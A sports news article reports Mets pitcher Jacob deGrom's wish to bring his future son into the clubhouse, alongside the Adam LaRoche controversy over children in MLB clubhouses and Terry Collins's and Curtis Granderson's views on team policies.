Mets' deGrom looking forward to bringing kid to clubhouse

JUPITER — Jacob deGrom hopes one day to bring his son into the Mets clubhouse. The righthander, who is awaiting the birth of his first child within the next few weeks, said Thursday that is one of the things he is looking forward to.

“That’s something that’s really cool for a father and son,” deGrom said. “I think it will be fine as long as it’s the right times.”

The balance of finding that “right time” for kids in the clubhouse is at the heart of the controversy surrounding Adam LaRoche and his sudden retirement after White Sox team president Ken Williams told him to limit the time his 14-year old son Drake spent with the team. Reports said that the White Sox players almost boycotted Wednesday’s spring training game in support of LaRoche, but manager Robin Ventura intervened.

MCCARRON: LAROCHE AND WHITE SOX COULD’VE FOUND MIDDLE GROUND

MLB does not have a general policy on children in the clubhouse, each team sets its own policy.

Terry Collins has been allowed to set his own clubhouse policy. The Mets manager has asked players to have children out of the clubhouse an hour before the game begins and not back in until a half an hour after a game, win or lose.

The Mets, being a team of mostly young players, do not have that many children in general and very rarely has a youngster, mostly children of front office or clubhouse personnel, been seen in the clubhouse this spring. Last year, Michael Cuddyer would very occasionally have his 7-year-old son in the clubhouse.

In his 13 years in the majors, playing for the Tigers, Yankees and Mets, Curtis Granderson has never seen an issue with a child in the clubhouse.

“There have been guys who have had their sons around for different things, batting practice, bat boys and workouts,” Granderson said. “I brought my cousins over to the field one time to do it, so from the teams I have been with, I haven’t seen any issues with it. It’s a father-son thing.”

Granderson did not want to speak specifically on the White Sox situation, but he does not think it needs to be a league-wide policy.

“Whatever rule or guideline the team decides to set forth, then make it knows so everybody knows what’s going on,” Granderson said. “Some teams I have played with the kids can be in at this time, with some teams kids can be in that time, or not at this time.

“Each team is different, just set it up and everyone knows.”

LaRoche apparently walked away from $13 million because he was upset when Williams asked him to limit his son’s time at spring training. Williams claimed Drake was there “100%” of the time. Bryce Harper and Chipper Jones were among those across MLB that voiced their support for LaRoche on Twitter.
